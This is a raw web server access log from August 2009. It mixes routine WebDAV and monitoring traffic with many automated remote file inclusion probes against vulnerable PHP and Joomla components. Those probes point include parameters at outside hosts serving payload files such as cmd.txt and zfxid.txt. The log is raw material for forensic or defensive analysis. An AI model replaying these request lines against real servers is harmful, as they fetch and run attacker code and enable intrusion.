172.16.1.176 - - [05/Aug/2009:08:27:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:27:16 -0400] "GET /logs/error_log.Q109052100%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:17 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:17 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:17 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:27:17 -0400] "GET /logs/error_log.Q109062000%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:28 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:28 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:28 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:27:30 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:27:30 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:27:30 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:27:32 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:33 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:27:39 -0400] "GET /logs/error_log.Q109051000%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:27:39 -0400] "GET /logs/access_log.Q109060700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:27:39 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:27:39 -0400] "GET /logs/error_log.Q109051700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:27:43 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
172.16.1.79 - - [05/Aug/2009:08:27:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [05/Aug/2009:08:27:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [05/Aug/2009:08:27:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:27:58 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
172.16.1.168 - - [05/Aug/2009:08:27:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:27:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:27:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:28:08 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:28:12 -0400] "GET /logs/access_log.Q109070700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:28:17 -0400] "GET /logs/access_log.Q109051000%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.95 - - [05/Aug/2009:08:28:21 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.95 - - [05/Aug/2009:08:28:21 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.95 - - [05/Aug/2009:08:28:21 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.95 - - [05/Aug/2009:08:28:21 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.95 - - [05/Aug/2009:08:28:21 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.95 - - [05/Aug/2009:08:28:21 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:28:31 -0400] "GET /logs/access_log.Q109060100%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:28:31 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:28:31 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:28:31 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.38.0.130 - - [05/Aug/2009:08:28:47 -0400] "GET /logs/access_log.Q109061700////?_SERVER[DOCUMENT_ROOT]=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
201.38.0.130 - - [05/Aug/2009:08:28:47 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 200 12413 "-" "libwww-perl/5.805"
172.16.1.79 - - [05/Aug/2009:08:28:57 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [05/Aug/2009:08:28:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [05/Aug/2009:08:28:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.15.48.60 - - [05/Aug/2009:08:28:58 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:08:28:58 -0400] "GET /logs/access_log.Q109070300//convert/mvcw.php?step=1&vwar_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:08:28:58 -0400] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:08:28:59 -0400] "GET /logs/access_log.Q109051000//convert/mvcw.php?step=1&vwar_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
201.38.0.130 - - [05/Aug/2009:08:29:06 -0400] "GET /logs/access_log.Q109060400////?_SERVER[DOCUMENT_ROOT]=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
172.16.1.73 - - [05/Aug/2009:08:29:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [05/Aug/2009:08:29:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [05/Aug/2009:08:29:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
208.113.196.16 - - [05/Aug/2009:08:29:24 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:24 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:24 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:24 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:28 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:29 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:29 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:32 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:32 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:32 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:32 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:32 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:32 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:34 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:34 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:35 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:36 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:38 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:41 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:29:41 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:07 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:07 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:07 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:07 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:07 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:07 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:21 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:30:22 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:30:33 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:30:33 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:30:33 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.231.126.252 - - [05/Aug/2009:08:30:40 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
172.16.1.168 - - [05/Aug/2009:08:31:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:31:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:31:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:31:10 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
172.16.1.69 - - [05/Aug/2009:08:31:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:31:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:31:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:31:39 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:31:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:31:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [05/Aug/2009:08:31:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.236.100.30 - - [05/Aug/2009:08:32:24 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:32:24 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:32:24 -0400] "GET /logs/error_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
63.147.72.145 - - [05/Aug/2009:08:32:26 -0400] "GET /logs/access_log.Q109062900/scanhttp://droneh.altervista.org//r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
203.236.100.30 - - [05/Aug/2009:08:32:49 -0400] "GET /logs/error_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:32:58 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
172.16.1.95 - - [05/Aug/2009:08:33:00 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
212.227.94.52 - - [05/Aug/2009:08:33:16 -0400] "GET /logs/error_log.Q109062800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.networkpittsburgh.com//zfxid.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
212.227.94.52 - - [05/Aug/2009:08:33:16 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.networkpittsburgh.com//zfxid.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
212.227.94.52 - - [05/Aug/2009:08:33:16 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.networkpittsburgh.com//zfxid.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
212.227.94.52 - - [05/Aug/2009:08:33:16 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.networkpittsburgh.com//zfxid.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
172.16.1.88 - - [05/Aug/2009:08:34:26 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:34:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:34:26 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:34:27 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:34:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:34:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:34:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:34:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:34:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.221.88.162 - - [05/Aug/2009:08:35:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 2.0.50727)"
64.221.88.162 - - [05/Aug/2009:08:35:10 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 2.0.50727)"
64.221.88.162 - - [05/Aug/2009:08:35:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 2.0.50727)"
64.221.88.162 - - [05/Aug/2009:08:35:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 2.0.50727)"
172.16.1.88 - - [05/Aug/2009:08:35:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:35:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:35:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [05/Aug/2009:08:35:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [05/Aug/2009:08:35:40 -0400] "PROPFIND /ca400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [05/Aug/2009:08:35:40 -0400] "PROPFIND /ca400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.236.100.30 - - [05/Aug/2009:08:35:41 -0400] "GET /logs/error_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.236.100.30 - - [05/Aug/2009:08:35:41 -0400] "GET /logs/error_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:08:35:54 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
